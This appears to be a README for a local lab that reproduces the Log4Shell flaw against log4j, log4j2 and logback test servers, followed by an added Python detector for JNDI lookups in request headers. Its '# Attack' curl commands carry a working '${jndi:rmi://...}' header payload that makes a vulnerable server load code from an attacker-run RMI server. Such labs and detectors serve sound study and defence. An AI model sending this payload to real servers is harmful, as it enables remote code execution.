victim resource

  • log4j: http://localhost:8000
  • log4j2: http://localhost:8001
  • logback: http://localhost:8002

attacker resource

  • class: http://localhost:2000
  • rmi: http://localhost:3000
  • ldap: TODO

How to

$ # class -> (rmi/ldap) -> (victim server)
$ cd class && make
$ make
$ java -jar target/log4j.jar
$ java -jar target/log4j2.jar
$ java -jar target/logback.jar

$ # Attack
$ curl http://127.0.0.1:8000 -H 'x-rce:${jndi:rmi://127.0.0.1:3000/exec}'
$ curl http://127.0.0.1:8001 -H 'x-rce:${jndi:rmi://127.0.0.1:3000/exec}'
$ curl http://127.0.0.1:8002 -H 'x-rce:${jndi:rmi://127.0.0.1:3000/exec}'
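
Detection side of the requests above, as an added example (not part of this project's code): it scans the headers of a raw HTTP request for a literal ${jndi:...} lookup and reports the scheme, host and port it points at. The function names and sample requests are constructed for illustration, and only the literal form used in the curl commands above is matched.

```python
import re
from urllib.parse import urlsplit

# Literal JNDI lookup as sent in the lab's x-rce header: ${jndi:<url>}
JNDI_LOOKUP = re.compile(r"\$\{jndi:([^}\s]+)\}", re.IGNORECASE)


def parse_headers(raw_request):
    """Return the header fields of a raw HTTP/1.1 request as a dict."""
    headers = {}
    for line in raw_request.splitlines()[1:]:   # skip the request line
        if not line.strip():                    # blank line ends the headers
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def find_jndi_lookups(raw_request):
    """Return one finding per JNDI lookup found in any header value."""
    findings = []
    for name, value in parse_headers(raw_request).items():
        for match in JNDI_LOOKUP.finditer(value):
            finding = {"header": name, "url": match.group(1)}
            try:
                target = urlsplit(finding["url"])
                finding.update(scheme=target.scheme.lower(),
                               host=target.hostname, port=target.port)
            except ValueError:
                pass    # malformed authority: keep the hit, skip parsed fields
            findings.append(finding)
    return findings


# Constructed sample requests (not captured traffic).
FLAGGED = (
    "GET / HTTP/1.1\r\n"
    "Host: 127.0.0.1:8000\r\n"
    "x-rce:${jndi:rmi://127.0.0.1:3000/exec}\r\n"
    "\r\n"
)
CLEAN = "GET / HTTP/1.1\r\nHost: 127.0.0.1:8000\r\nUser-Agent: curl/8.0\r\n\r\n"

if __name__ == "__main__":
    for sample in (FLAGGED, CLEAN):
        print(find_jndi_lookups(sample))
```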